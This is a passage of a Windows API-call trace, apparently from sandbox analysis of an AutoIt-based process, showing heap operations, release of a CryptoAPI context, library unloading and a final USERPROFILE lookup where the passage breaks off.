[0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0257.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0257.667] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0257.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56060 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56060 | out: hHeap=0x970000) returned 1 [0257.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0257.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0257.667] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0257.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0257.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0257.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0257.669] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.669] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0257.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0257.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0257.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.670] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0257.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0257.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0257.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0257.671] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0257.672] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0257.672] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0257.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0257.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0257.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0257.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0257.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0257.675] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0257.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0257.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0257.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0257.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0257.675] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0257.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0257.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0257.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.676] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0257.676] FreeLibrary (hLibModule=0x756e0000) returned 1 [0257.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0257.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0257.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.677] CloseHandle (hObject=0x2a0) returned 1 [0257.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.678] CloseHandle (hObject=0x2d0) returned 1 [0257.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.683] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.684] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: 